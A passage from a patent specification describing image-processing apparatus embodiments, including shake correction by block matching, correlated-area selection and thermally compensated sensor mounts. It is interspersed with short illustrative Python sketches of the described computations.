Next, the second data item is supplied to the LCD 130, which displays the second reference image. The second reference image is focused on the CCD 150 in the same way as the first reference image, and is converted into analog signals and then to digital data in the same way. In the meantime, the movable contact of the switch 152 is moved and connected to the fixed contact b, which is connected to a memory 154. As a result, the digital data representing the second reference image is stored into the memory 154. The data items stored in the memories 153 and 154 are read to an S,R detector 155. The detector 155 detects the displacement of the second reference image with respect to the first reference image, and produces data representing the displacement. The displacement data is stored into an S,R memory 133.

Then, the third data item is supplied to the LCD 131, which displays the third reference image. The third reference image is focused on the CCD 150 in the same way as the first reference image, and is converted into analog signals and then to digital data in the same way. Meanwhile, the movable contact of the switch 152 is moved and connected to the fixed contact a, which is connected to the memory 153, and the digital data representing the third reference image is stored into the memory 153. The data items stored in the memories 153 and 154 are read to the S,R detector 155. The detector 155 detects the displacement of the third reference image with respect to the second reference image, and produces data representing the displacement. The displacement data is stored into the S,R memory 133.

Hence, with the projector it is possible to detect the displacements of the LCDs 129, 130, and 131. To obtain the three reference data items, use may be made of a reference image similar to the one used in the eleventh embodiment (FIGS. 45A, 45B, and 45C).

The mirror 149, which is used to detect the displacements of the LCDs 129, 130, and 131, may be replaced by a half mirror 156, as is shown in FIG. 61. In this case, the reference image displayed by each LCD is projected onto the screen 127, and the light reflected from the screen 127 is applied to the half mirror 156, which reflects the light to the CCD 150. Alternatively, a camera may be used exclusively for detecting the displacements of the LCDs 129, 130, and 131.
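Since each displacement is detected relative to the reference image shown just before it, aligning all three LCDs to the first one requires composing the pairwise results. A bookkeeping sketch (the function name is invented; points are assumed to map as x' = R·x + S):

```python
import numpy as np

def compose(R_ab, S_ab, R_bc, S_bc):
    """Given the displacement (R_ab, S_ab) of image B relative to image A
    and (R_bc, S_bc) of image C relative to image B, return the
    displacement of C relative to A."""
    return R_ab @ R_bc, R_ab @ S_bc + S_ab

# Displacement of the LCD 131 relative to the LCD 129, from the two
# pairwise detections stored in the S,R memory 133:
# R_31, S_31 = compose(R_21, S_21, R_32, S_32)
```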
The present invention can also be applied to a CRT monitor of the structure shown in FIG. 62. As FIG. 62 shows, the CRT monitor comprises interpolation circuits 161 to 165, electron guns 186 to 190, a phosphor screen 193, and a spatial filter 194. The electron guns 186 to 190 emit electron beams to the screen 193, thereby forming parts of an image. The interpolation circuits 161 to 165 process the data items representing the image parts. As a result, the image parts are moved linearly and rotated on the screen 193, compensating for the displacements of the electron guns with respect to their desired positions and forming an image having no discontinuity. The spatial filter 194 is a low-pass filter such as a quartz filter.

Since a plurality of electron guns are used, the distance between the phosphor screen 193 and the beam-emitting section is shorter than in the case where only one electron gun is used. The electron guns 186 to 190 may be replaced by, for example, lasers or a unit comprising LEDs (having a lens) and micro-machined mirrors. The image distortion caused by electromagnetic deflection may be eliminated by means of the interpolation circuits 161 to 165. The intervals of the scanning lines, which have changed due to the image distortion, may be utilized to set a cutoff frequency for the spatial filter 194. Further, when lasers are used in place of the electron guns, spatial filters may be located in front of the lasers, respectively.

A film-editing apparatus, which is an eighteenth embodiment of the invention and which incorporates line sensors, will be described with reference to FIG. 63 and FIGS. 64A to 64E. The film-editing apparatus comprises a loading mechanism 402, a light source 403, a focusing lens 404, an imaging section 405, a drive circuit 407, an image-synthesizing circuit 408, a display 409, a memory 410, and a printer 411.

When driven by the circuit 407, the loading mechanism 402 rewinds the film 401. The light source 403 is located opposite to the focusing lens 404, for applying light to the lens 404 through the film 401. The lens 404 focuses the image recorded on the film 401 on the light-receiving surface of the imaging section 405. The section 405 converts the input image into image signals, which are amplified by preamplifiers 10a, 10b, and 10c. The amplified signals are supplied to A/D converters 14a, 14b, and 14c and converted thereby to digital signals. The signal processors 20a, 20b, and 20c perform γ correction and edge emphasis on the digital signals. The digital signals, thus processed, are stored into frame memories 22a, 22b, and 22c. The image signals read from the frame memories 22a, 22b, and 22c are input to the image-synthesizing circuit 408. The circuit 408, which has a structure similar to that of FIG. 55, processes the input signals, generating three data items representing a red (R) image, a green (G) image, and a blue (B) image. These image data items are output to the display 409, the memory 410, and the printer 411. The imaging section 405 has the structure shown in FIG. 64A. That is, it comprises three line sensors 406a, 406b, and 406c. As is evident from FIG. 64C, each line sensor is equipped with an optical RGB filter.

The film-editing apparatus is characterized in that the line sensors detect images while the film 401 is fed, passing through the gap between the light source 403 and the focusing lens 404, and that the images thus read from the film 401 are combined into a single image. To be more specific, the images A, B, and C which the line sensors 406a, 406b, and 406c receive, as is shown in FIG. 64B, are combined into a single image which corresponds to one frame image on the film 401. The images A, B, and C are displaced with respect to one another, since the line sensors cannot be, and are not, positioned with precision. Nevertheless, the mutual displacement is compensated for in the film-editing apparatus by means of the technique described above.

The line sensors 406a, 406b, and 406c are much less expensive than area sensors. Hence, the film-editing apparatus can accomplish high-resolution photographing at a very low cost. If the film 401 is a color one, the apparatus can easily produce color image signals.
More line sensors may be used, arranged in staggered fashion, as is shown in FIG. 64D. In this case, the images detected by the sensors are positioned as is illustrated in FIG. 64E. The film-editing apparatus can be modified in various ways. For example, not the film 401, but the light source 403, the lens 404, and the imaging section 405 may be moved together parallel to the film, thereby to read images from the film 401. Further, each line sensor-RGB filter unit may be replaced by an RGB line sensor which is designed for RGB photography. Still further, the RGB filter (FIG. 64C) may be replaced by a rotating color filter. An image processing apparatus according to a nineteenth embodiment of the invention will be described with reference to FIGS. 65A and 65B. This embodiment uses CMDs and requires no frame memories whatever for assisting interpolation. The nineteenth embodiment can perform random access and nondestructive read. The random access is to read the value of a pixel at any given position. The nondestructive read is to read pixel signals as many times as desired, without losing signal charges, up until the pixel signals are reset. Due to the nondestructive read it is possible to use each CMD as a sort of memory, at least for a relatively short period of time. Utilizing the random access and the nondestructive read, interpolation can be executed without using frame memories. More precisely, pixel values required for achieving interpolation are read by the random access from the CMDs, which are used in place of frame memories. As FIG. 65A shows, the image processing apparatus comprises, among other components, CMD drivers 32a and 32b, a system controller 33, and an analog interpolation section 415. The CMD drivers 32a and 32b are independently controlled by the system controller 33. They are identical in structure, each comprising an address generator 412, an x-decoder 413, and a y-decoder 414, as shown in FIG. 65B. The address generator 412 generates addresses, which are supplied to the x-decoder 413 and the y-decoder 414, respectively. In accordance with the input addresses, the decoders 413 and 414 produce pulse signals representing the position of a designated pixel. The pulse signals produced by the CMD driver 32a are supplied to a CMD 8, whereas the pulse signals produced by the CMD driver 32b are supplied to a CMD 9. The analog interpolation section 415 comprises a coefficient generator 416, a multiplier 417, an adder 418, a sample-hold circuit 419, and a switch 420. The switch 420 connects the output of the sample-hold circuit 419 to either the ground or the adder 418. The interpolation, which is a characterizing feature of the nineteenth embodiment, will be explained. The interpolation performed in this embodiment is similar to that effected in the first embodiment (FIG. 6). As shown in FIGS. 5A and 5B, the signal representing a pixel d_ij (i=1 to u, j=1 to w) is read from the CMD 8, converted to a digital signal, processed, and written into a frame memory 30 at a specified address thereof. In the meantime, for a pixel d_ij (i=u+1 to u+v, j=1 to w), the four signals representing the four pixels located around that pixel are read from the CMD 9 by means of random access and nondestructive read. The analog interpolation section 415 executes the analog operation defined by equation (9) on the four pixel signals.
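Equation (9) is not reproduced in this excerpt, so the following is only a minimal software sketch of a four-neighbor interpolation of the kind the analog interpolation section 415 might perform; the bilinear weighting and all names are illustrative assumptions, not the patent's own definition.

```python
# Hedged sketch: interpolate a pixel value from its four surrounding pixels,
# e.g., values read nondestructively from the CMD 9. Bilinear weighting is
# an assumption; equation (9) itself is not shown in this text.

def interpolate_four_neighbors(p00, p01, p10, p11, fx, fy):
    """p00..p11: the four neighboring pixel values.
    fx, fy: fractional position of the target pixel inside the cell
    spanned by the four neighbors, each in [0, 1)."""
    top = p00 * (1.0 - fx) + p01 * fx       # blend along x on the top edge
    bottom = p10 * (1.0 - fx) + p11 * fx    # blend along x on the bottom edge
    return top * (1.0 - fy) + bottom * fy   # blend the two edges along y

# Example: target pixel a quarter of the way across and halfway down.
value = interpolate_four_neighbors(100, 120, 110, 130, fx=0.25, fy=0.5)  # -> 110.0
```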
The pixel signals thus processed are converted to digital signals, which are subjected to edge-emphasis and then written into the frame memory 30 at specified addresses thereof. The same pixel signal can be repeatedly read from the CMD 9, as many times as desired, since it is not destroyed at all whenever read from the CMD 9. Every time a pixel value is calculated by virtue of analog interpolation, the switch 420 connects the output of the sample-hold circuit 419 to the ground, thereby resetting the circuit 419 to "0." Alternatively, the switch 420 may connect the circuit 419 to the ground only when the value for the first of the four pixels is calculated, and connect the circuit 419 to the adder 418 when the values for the second to fourth pixels are calculated. The image processing apparatus shown in FIGS. 65A and 65B can combine a plurality of images into one, without using frame memories equivalent to the memories 22 and 23 which are indispensable to the first embodiment (FIG. 6). The apparatus can, therefore, be manufactured at low cost. The displacements of the CMDs 8 and 9 can be measured by the same method as in the first embodiment. The coefficients output by the coefficient generator 416 may be those selected from several typical coefficient sets prepared in advance. If so, the generator 416 can be a small-scale circuit. The PS converter 29 may be replaced by an image-synthesizing circuit of the type illustrated in FIG. 38. Another image processing (image-reproducing) apparatus, which is a twentieth embodiment of this invention, will be described with reference to FIG. 66. To read images from photographic film by a plurality of line sensors at high speed, so that these images are fast combined and recorded, it is usually necessary to shorten the exposure time of each line sensor. To this end, the amount of light applied to the film must be increased. The light amount can be increased by using a high-power light source, but such a light source has a great size and consumes much electric power. In the twentieth embodiment, use is made of a special illumination unit. As shown in FIG. 66, the illumination unit comprises a light source 403, a concave mirror 421, and a cylindrical lens 422. The source 403 emits light, and the mirror 421 applies the light to the cylindrical lens 422. The lens 422 converts the input light into three converged beams. The beams, which are intense and have an elongated cross-section, are applied to photographic film 401, illuminating only those three portions of the film 401 which oppose the line sensors of the imaging section 405. Hence, image data can be fast input, without using a high-power, large light source. An image processing apparatus according to a twenty-first embodiment of the invention will be described, with reference to FIGS. 67 and 68, FIGS. 69A to 69D, FIGS. 70A to 70D, FIG. 71, FIGS. 72A and 72B, FIG. 73, and FIGS. 74A and 74B. As FIGS. 74A and 74B show, this apparatus comprises two major sections, i.e., an imaging section A and a recording section B. The section A is designed to form an image of an object, and the section B to record or store the image formed by the section A. The image data produced by the imaging section A is transmitted to the recording section B, in the form of optical signals. In the imaging section A, the image 201 of an object is supplied through an imaging lens system 202, reflected by a mirror 203a, and focused on a CCD 204 (i.e., an imaging device).
The mirror 203a is connected at one edge to a shaft 203b and can be rotated around the shaft 203b by means of a drive mechanism (not shown). To take the image of the object, the drive mechanism intermittently rotates the mirror 203a in the direction of the arrow shown in FIG. 67, whereby the imaging area of the section A shifts over the object as shown in FIGS. 69A to 69D or FIGS. 70A to 70D. As a result, the imaging section A can photograph the object in a wide view. The drive mechanism rotates the mirror 203a intermittently at such timing that any two consecutive frame images overlap at least in part. The mirror 203a may be rotated manually, in which case the drive mechanism can be dispensed with. The light reflected by the mirror 203a is input to the CCD 204. The CCD 204 converts the light into an image signal, which is supplied to an A/D converter 205. The converter 205 converts the signal into digital image data. The data is digitized by a digitizer 206 by the known method and then compressed by a data-compressing circuit 207. Thus digitized and compressed, the digital image data is reduced so much that it can be transmitted, in the form of optical signals, from the imaging section A to the recording section B within a short time. However, the data may be damaged while being transmitted, due to the ambient light. To avoid such transmission errors, a circuit 208 adds error-correction codes to the compressed image data by the Reed-Solomon method or a similar method. The image data, now containing the error-correction codes, is modulated by a modulator 209 and then supplied to an LED driver 210. In accordance with the input image data, the LED driver 210 drives an LED 211, which emits optical signals 212. At the recording section B, a light-receiving diode 213 receives the optical signals 212 transmitted from the imaging section A. The signals 212 are demodulated by a demodulator 214, which produces digital image data. The data is input to an error-correcting circuit 215. The circuit 215 eliminates errors, if any, in the data, with reference to the error-correction codes contained in the image data. The image data, thus corrected, is supplied to a data-decoding circuit 216. The corrected image data is temporarily stored in a frame memory A 217. As indicated above, the mirror 203a is intermittently rotated, thereby shifting the imaging area of the section A intermittently and, thus, photographing the object repeatedly to form a wide-view image thereof. The imaging section A may shake during the interval between any two photographing steps since it is held by hand. If this happens, the resultant frame images of the object may be displaced from one another so much that a mere combination of them cannot make a high-resolution image of the object. To form a high-resolution image, the image data is read from the memory A 217 and input to a shake-correcting circuit 218. The circuit 218, which will be described later in detail, processes the image data, reducing the displacements of the frame images which have been caused by the shaking of the section A. The data output from the circuit 218 is stored into a frame memory B 219. The first frame image data (representing the image photographed first) is not processed by the shake-correcting circuit 218 but is stored directly into the frame memory B 219. The circuit 218 processes the second and subsequent frame image data items, converting them so that they represent frame images which are properly connected to the first frame image.
These data items are also stored into the frame memory B 219. Every pixel of the regions over which the frame images overlap one another is represented by the average of the values of the corresponding pixels of all the overlapping frame images, whereby a noise-reduced, high-quality single image will be obtained. The image data items read from the frame memory B 219 are supplied to a D/A converter 220 and converted to analog image data. The analog data is input to a CRT monitor 221, which displays the image represented by these data items. Alternatively, the image data items read from the memory B 219 are supplied to a printer 222, which prints the image. Still alternatively, the image data are input to a filing device 223 to enrich a database. With reference to FIG. 68, the shake-correcting circuit 218 will now be described in detail. Also it will be explained how the circuit 218 operates to correct the displacement of, for example, the Nth frame image, which has resulted from the shake of the imaging section A. The shake-correcting circuit 218 comprises two main components. One is a distance-measuring section 218a for measuring the distances the Nth frame image is displaced from the two adjacent frame images, the (N-1)th frame image and the (N+1)th frame image. The other is an image-moving section 218b for moving one adjacent frame image in parallel and rotating the other adjacent frame image, so that the (N-1)th, Nth, and (N+1)th frame images may be connected appropriately. The imaging area of the section A shifts over the object, while tilting in one direction and the other, as is illustrated in FIGS. 70A to 70D. Hence, the image of the object appears as if moving and rotating. The displacement of one frame image with respect to the next one can, therefore, be represented by a motion vector. The motion vector changes from one frame image to another, because it includes a component corresponding to the rotation of the frame image. The distance-measuring section 218a determines the motion vectors at two or more points in the common region of two adjacent frame images, thereby to measure the distance and the angle the second frame image is displaced and rotated with respect to the first frame image. The distance and the angle, thus measured, are supplied to the image-moving section 218b. In accordance with the distance and the angle, the section 218b converts the image data item showing the second frame image to a data item which represents a frame image assuming a proper position with respect to the first frame image. As a result, the two adjacent frame images are connected in a desirable manner. It will now be explained how the distance-measuring section 218a measures the distance and the angle the second frame image is displaced and rotated with respect to the first frame image. First, part of the data item representing the (N-1)th frame image is read from the frame memory A 217 and stored into a reference memory 232. The reference image has a size of 16×16 pixels in this instance. To detect the positional relation between the (N-1)th frame image and the Nth frame image, the two frame images are correlated.
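The overlap averaging described above is straightforward to express in software. The following is a minimal sketch, not the patent's implementation; the buffer sizes and function names are illustrative assumptions.

```python
# Hedged sketch of overlap averaging: where several shake-corrected frames
# cover the same output pixel, the stored value is the mean of all
# contributing frames, which suppresses noise in the overlap regions.
import numpy as np

def accumulate(canvas_sum, canvas_count, frame, top, left):
    """Add one aligned frame into running sum/count buffers."""
    h, w = frame.shape
    canvas_sum[top:top + h, left:left + w] += frame
    canvas_count[top:top + h, left:left + w] += 1

canvas_sum = np.zeros((480, 1280), dtype=np.float64)
canvas_count = np.zeros((480, 1280), dtype=np.int32)
# ...call accumulate() once per shake-corrected frame...
final_image = canvas_sum / np.maximum(canvas_count, 1)  # average the overlaps
```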
To be more specific, the data stored in the reference memory 232, which represents a portion of the (N-1)th frame image (hereinafter called "reference image"), is compared with the data representing that portion of the Nth frame image (hereinafter called "comparative image") which assumes the same position as said portion of the (N-1)th frame image and which is larger than said portion of the (N-1)th frame image. Next, as shown in FIG. 71, the reference image is moved to various positions over the comparative image, by means of an overlap-region position controller 240. While the reference image remains at each position, the value of every pixel of the reference image is compared with the value of the corresponding pixel of the comparative image. The absolute values of the differences between all pixels of the reference image, on the one hand, and the corresponding pixels of the comparative image, on the other, are added together under the control of an addition controller 241. The sum of the absolute values of said differences is thereby obtained. Then, the sums of absolute difference values, which have been obtained while the reference image stays at the various positions over the comparative image, are compared with one another. The position at which said sum of absolute difference values is the minimum is thereby determined. The displacement which the reference image at this very position has with respect to the comparative image is regarded as a motion vector. The signal output by the overlap-region position controller 240 and the signal produced by the addition controller 241 are input to a pixel-position calculator 233. One of the pixels of the Nth frame image stored in the frame memory A 217 is thereby designated. The value of this pixel is supplied to one input of a difference calculator 234. Meanwhile, the signal output by the addition controller 241 designates one of the pixels of the (N-1)th frame image stored in the reference memory 232, and the value of the pixel thus designated is supplied to the other input of the difference calculator 234. The difference calculator 234 calculates the difference between the input pixel values. The difference is input to an absolute value calculator 235, which obtains the absolute value of the difference. The absolute value is supplied to an adder 236. The adder 236 adds the input absolute value to the absolute difference value stored in a sum memory 237. Ultimately, the sum memory 237 stores the sum of 256 differences for the 16×16 pixels stored in the reference memory 232, under the control of the addition controller 241. This sum is input to a minimum value calculator 238 and used as a correlation signal for the overlap region of the (N-1)th frame image and the Nth frame image. The overlap region of the two frame images is shifted under the control of the overlap-region position controller 240, and the correlation signal obtained while the overlap region remains at each position is input to the minimum value calculator 238. The calculator 238 determines the position where the correlation signal has the minimum magnitude. The displacement of the Nth frame image with respect to the (N-1)th frame image is input, as a motion vector v, to a Δx-Δy-Δθ calculator 239. Assume that the correlation between the reference image and the comparative image is most prominent when the reference image is located at the position (-x, -y), as is illustrated in FIG. 71. Then, the motion vector v is (x, y).
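The search just described is a sum-of-absolute-differences (SAD) block match. The following is a minimal software sketch of the same computation that the difference calculator 234, absolute value calculator 235, adder 236, and sum memory 237 perform in hardware; the function and variable names are illustrative, not from the patent.

```python
# Hedged sketch of the SAD search of FIG. 71: slide a 16x16 reference block
# from the (N-1)th frame over a larger search window in the Nth frame and
# take the offset with the smallest SAD as the motion vector.
import numpy as np

def find_motion_vector(reference, window):
    """Return the (dy, dx) offset of `reference` inside `window` with minimum SAD."""
    rh, rw = reference.shape
    best, best_offset = None, (0, 0)
    for dy in range(window.shape[0] - rh + 1):
        for dx in range(window.shape[1] - rw + 1):
            patch = window[dy:dy + rh, dx:dx + rw]
            # Cast to a signed type so 8-bit pixel differences cannot wrap.
            sad = np.sum(np.abs(patch.astype(np.int32) - reference.astype(np.int32)))
            if best is None or sad < best:
                best, best_offset = sad, (dy, dx)
    return best_offset
```

For a 16×16 reference block each candidate position accumulates 256 absolute differences, matching the sum of 256 differences held in the sum memory 237.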
The motion vectors are accumulated in a memory (not shown), whereby the motion vector is obtained which indicates the position the Nth frame image has with respect to the first frame image. Motion vectors of this type are obtained for at least two given points a and b in the Nth frame image. The two motion vectors are input to the Δx-Δy-Δθ calculator 239. The calculator 239 calculates two motion vectors for the points a and b, i.e., v1(x1, y1) and v2(x2, y2). The Δx-Δy-Δθ calculator 239 calculates, from the vectors v1 and v2, the position at which to write the Nth frame image (now stored in the frame memory A 217) in the frame memory B 219. This position is defined by the parallel motion distances (Δx and Δy) and the counterclockwise rotation angle Δθ of the Nth frame image. How the calculator 239 calculates the position will be explained with reference to FIGS. 72A and 72B. As can be understood from FIG. 72A, a motion vector v can be considered to be synthesized from two vectors S and r, which pertain to the parallel motion and the rotation of a frame image, respectively. The motion vector v is evaluated in units of one-pixel width. Nonetheless, it can be evaluated more minutely by interpolating a correction value from the correlations among the pixels, as is disclosed in Published Unexamined Japanese Patent Application 4-96405. The vector S and the vector r are thereby obtained from the vectors v1 and v2. The components of the vector S are Δx and Δy. As is evident from FIG. 72B, the value for Δθ can be given approximately from the difference between v1 and v2. The distances of parallel motion and the angle of rotation can be obtained more accurately by using not only the motion vectors for the points a and b, but also the motion vectors for many other points. The parallel motion distances Δx and Δy and the rotation angle Δθ are input to the image-moving section 218b. The section 218b processes the image data showing the Nth frame image in accordance with the distances Δx and Δy and the angle Δθ, thereby moving the Nth frame image linearly and rotating it. The image data item showing the Nth frame image thus moved and rotated is written into the frame memory B 219. It suffices to set the center of rotation of the Nth frame image at the midpoint between the points a and b. If motion vectors are calculated for three or more points, the center of rotation may be set in accordance with the positions of those points. Since the pixel positions are discrete, each pixel of the Nth frame image, moved and rotated, usually does not assume the same position as the corresponding position in the frame memory B 219. For this reason, instead of the signal representing the pixel, the signal representing an adjacent pixel which takes the position most similar to that position in the memory B 219 may be written at said position in the memory B 219. Alternatively, a pixel value interpolated from the values of some pixels which assume positions similar to that position in the memory B 219 may be stored at the position in the memory B 219. (The method utilizing interpolation is preferable since it may serve to form a high-quality image.) If any pixel of the Nth frame image is identical to one pixel of the (N-1)th frame image, whose value is already stored in the frame memory B 219, its value is not written into the memory B 219.
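The patent's own equations for S, r, and Δθ are not reproduced in this text. The following is therefore only a hedged reconstruction, consistent with the description of FIGS. 72A and 72B: each motion vector is treated as a common translation S plus a small rotation about the midpoint of a and b, so the rotation components cancel on averaging and Δθ follows from the residual difference of the two vectors. All names are illustrative.

```python
# Hedged reconstruction (an assumption, not the patent's equations):
# v1 at point a and v2 at point b are decomposed into a shared translation
# (dx, dy) and a small counterclockwise rotation dtheta about the midpoint
# of a and b.

def delta_x_y_theta(v1, v2, a, b):
    """v1, v2, a, b are (x, y) tuples; returns (dx, dy, dtheta)."""
    # Translation: the rotation contributions at a and b are equal and
    # opposite when the center is the midpoint, so they cancel here.
    dx = (v1[0] + v2[0]) / 2.0
    dy = (v1[1] + v2[1]) / 2.0
    # Rotation: for a small angle, v2 - v1 = dtheta * perp(b - a), so the
    # signed angle is cross(b - a, v2 - v1) / |b - a|^2 (radians, CCW > 0).
    ux, uy = b[0] - a[0], b[1] - a[1]
    wx, wy = v2[0] - v1[0], v2[1] - v1[1]
    dtheta = (ux * wy - uy * wx) / (ux * ux + uy * uy)
    return dx, dy, dtheta
```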
Rather, its value and the value of the identical pixel are added, in a predetermined ratio, and the resultant sum is stored into the memory B 219. This method helps enhance the quality of the output image. The optimal value for the predetermined ratio depends on how many times the same pixel is written into the frame memory B 219. In the twenty-first embodiment, the imaging area of the section A can be switched rather roughly, and a simple means such as a polygonal mirror can be used to control the optical system for switching the imaging area. Further, the imaging section A can operate well even while held by hand because its shake is compensated well. FIGS. 74A and 74B illustrate how the apparatus according to the twenty-first embodiment is used. The imaging section A can be held by hand as shown in FIG. 74A since its shake is compensated. The imaging section A and the recording section B (FIG. 74B) need not be connected by a cable and can therefore be located far from each other. This is because, as is shown in FIGS. 74A and 74B, the section A can transmit signals to the recording section B in the form of infrared rays or radio waves. The imaging section A can be small and light and can therefore be manipulated easily. An image processing apparatus, which is a twenty-second embodiment of this invention, will be described with reference to FIG. 75. FIG. 75 shows only the components which characterize this embodiment. Except for these components, the twenty-second embodiment is identical to the twenty-first embodiment. The twenty-second embodiment has an optical system designed exclusively for detecting the shake of an image. In operation, an image 265 of an object is applied through a lens system 266 to a mirror 267a. The mirror 267a reflects the image to a half mirror 268. The half mirror 268 reflects the image and applies it to an imaging device 269, which is a line sensor. The imaging device 269 converts the image into image data, which is supplied to a CRT or a printer (neither shown) so that the image may be displayed or printed. Meanwhile, the input image is applied through the half mirror 268 and a magnifying system 270 to an imaging device 271. As a result, the image is magnified and focused on the imaging device 271. The device 271 converts the image into image data from which a shake, if any, of the image will be detected. Since the image focused on the imaging device 271 has been magnified by the magnifying system 270, the motion vectors pertaining to the pixels forming the image can be detected in high resolution. Hence, the parallel motion distances Δx and Δy and the rotation angle Δθ, i.e., the factors required in reconstructing the image, can be calculated more accurately than in the twenty-first embodiment. As a result, the reconstructed image will have higher quality. In addition, the imaging device 269, which is a line sensor, can read the input image at high speed, that is, can read many pixels per unit of time. In the twenty-first embodiment and the twenty-second embodiment, the displacement of an image with respect to the next image taken is detected from the positional correlation between the two images. If the images are low-contrast ones, however, the errors in the results of the correlation calculation are inevitably great. With reference to FIGS. 76A and 76B, an image processing apparatus will be described which can calculate the correlation with sufficient accuracy and which is a twenty-third embodiment of the present invention. As FIG.
76A shows, two highly correlative objects are placed above and below an object of photography. The "highly correlative" objects have broad bands in the Nyquist frequency range, such as two-dimensional chirp waves, random-dot patterns defined by random numbers, white-noise amplified patterns, or dot-image patterns. Alternatively, as shown in FIG. 76B, characters and lines may be drawn on the upper and lower edges of the image of an object. For example, an image located near a dot-image pattern is used as a reference image in calculating the correlation. In this case, the apparatus can calculate the correlation with very high accuracy. An image processing apparatus according to a twenty-fourth embodiment will be described with reference to FIGS. 77 to 79, FIGS. 80A to 80C, and FIGS. 81 to 83. This embodiment can increase the accuracy of the correlation calculation without using highly correlative patterns of the types utilized in the twenty-third embodiment. The embodiment is identical to the twenty-first embodiment (FIG. 67), except that a correlated area selector is incorporated in a shake-correcting circuit 218 of the type shown in FIG. 68, so that a highly correlative area is selected. Hence, FIG. 77 shows only the components which characterize the twenty-fourth embodiment. In operation, the image data output from a frame memory A 217 is input to a distance-measuring section 218a, an image-moving section 218b, and a correlated area selector 218c. The circuit 218c selects the most highly correlative part of the input image, and inputs data representing a reference image to the distance-measuring section 218a, which will be described later. From the two input images, the distance-measuring section 218a measures the displacement of one of the images with respect to the other image. The displacement, thus measured, is supplied to the circuit 218b, which moves and rotates the first image, thus positioning the first image such that it is properly connected to the second image. FIG. 78 shows, in detail, the correlated area selector 218c. As is evident from FIG. 78, in the selector 218c, one of, for example, n possible images a_1 to a_n and one of n possible images b_1 to b_n shown in FIG. 79 are selected in accordance with the input image data, and dispersion-detecting circuits 243 and 244 detect the dispersion values σa_i and σb_i for the selected images a_i and b_i. The sum σ_i of these dispersion values is supplied to a maximum value calculator 245. The calculator 245 outputs the value i_max which renders the sum σ_i maximal. The value i_max is supplied to a correlated area reading circuit 246. The circuit 246 reads the two reference images corresponding to i_max, which are input to the distance-measuring section 218a. Hence, the two images compared have high contrast, and the correlation calculation can therefore be performed with high accuracy. The dispersion-detecting circuits 243 and 244 can be of various types. For example, each may be a high-pass filter or a band-pass filter. Alternatively, each may be a convolution filter having such coefficients as are shown in FIGS. 80A-80C. Further, the circuits 243 and 244 may be of the type shown in FIG. 81, wherein use is made of the sum of the value differences among adjacent pixels. An image processing apparatus, designed to form a high-resolution image or a wide image, has a plurality of imaging devices.
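The selection rule of the correlated area selector 218c amounts to picking the candidate block with the largest dispersion, since a high-contrast block gives a sharp correlation minimum. Below is a minimal sketch of that rule; the candidate positions, block size, and the use of plain variance as the dispersion measure are illustrative assumptions.

```python
# Hedged sketch of correlated-area selection: among candidate reference
# blocks, return the one with maximal dispersion (here, variance).
import numpy as np

def select_reference_block(image, candidates, size=16):
    """candidates: iterable of (top, left); returns the best (top, left)."""
    best_pos, best_var = None, -1.0
    for top, left in candidates:
        block = image[top:top + size, left:left + size]
        var = float(np.var(block))   # dispersion of the candidate block
        if var > best_var:
            best_var, best_pos = var, (top, left)
    return best_pos
```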
The holders holding the imaging devices may expand or contract as their temperature changes with the ambient temperature or with an increase and decrease of the heat they generate. In such an event the relative positions of the devices will alter, making it difficult to provide a high-quality image. To prevent the devices from changing their relative positions, the holders are usually made of a material having a small thermal expansion coefficient. Generally, such material is expensive and hard to process. The manufacturing cost of the image processing apparatus is inevitably high. In the present invention, a technique may be applied in the imaging section to avoid changes in the relative positions of the imaging devices, without using a material having a small thermal expansion coefficient. Two examples of the technique will be described with reference to FIG. 82 and FIG. 83. In the example of FIG. 82, a beam splitter 282 for splitting input light into two parts is secured to a holder 283, which in turn is fastened to one end of a base 281. An L-shaped holder 285 holding an imaging device 284a (e.g., a CCD), and a holder 286 holding an imaging device 284b are fastened to the base 281, such that the devices 284a and 284b are so positioned as to receive the two light beams output from the beam splitter 282 and convert them into electric signals. In other words, the imaging devices 284a and 284b are set in planes conjugate to that of the semitransparent mirror of the beam splitter 282. At the other end of the base 281 an optical system 287 is located. A rotary filter 288 is arranged between the beam splitter 282 and the optical system 287. The first imaging device 284a is spaced apart from the semitransparent mirror of the beam splitter 282 by a distance n. The second imaging device 284b is spaced apart from the semitransparent mirror by a distance m. The distance m is equal to the distance n, that is, m=n. The light-receiving surface of the first device 284a is spaced in the vertical direction from the top of the base 281 by a distance q. The screw fastening the holder 286 to the base 281 has a play p. The play p is far less than the distance q, that is, p<q. Generally, a material having an extremely small thermal expansion coefficient is chosen for the holders 285 and 286 holding the devices 284a and 284b, respectively, in order to prevent displacement of one imaging device with respect to the other when the holders 285 and 286 experience temperature changes. Such material is expensive and, to make matters worse, has poor processibility, and preferably should not be used. The materials in common use have thermal expansion coefficients differing over a broad range. In the present example shown in FIG. 82, a material having a large thermal expansion coefficient is also positively used, ultimately reducing the manufacturing cost of the image processing apparatus. More specifically, two different materials are selected for the holders 285 and 286, respectively, to satisfy the equation p×α = q×β, where α and β are the thermal expansion coefficients of the materials, respectively, p is the play of the screw, and q is the distance between the base 281 and the device 284a. Hence, even if the holders 285 and 286 undergo temperature changes, the distances m and n remain equal to each other, whereby the imaging devices 284a and 284b are maintained, each at the same position relative to the other as before.
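A quick numeric check makes the compensation condition p×α = q×β concrete. The coefficient values below are illustrative assumptions (roughly aluminum-like and steel-like materials), not values from the patent.

```python
# Hedged numeric check of p * alpha == q * beta: when the condition holds,
# the thermally induced displacements of the two mounts are equal for any
# temperature change, so the devices keep their relative positions.
p = 2.0e-3        # play of the screw (m), illustrative
q = 10.0e-3       # distance between base and device 284a (m), illustrative
alpha = 23e-6     # expansion coefficient of one holder material (1/K)
beta = alpha * p / q   # choose the other material so p*alpha == q*beta

dT = 15.0                    # temperature rise (K)
shift_1 = p * alpha * dT     # displacement governed by the play p
shift_2 = q * beta * dT      # displacement governed by the distance q
assert abs(shift_1 - shift_2) < 1e-12  # the two displacements cancel
```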
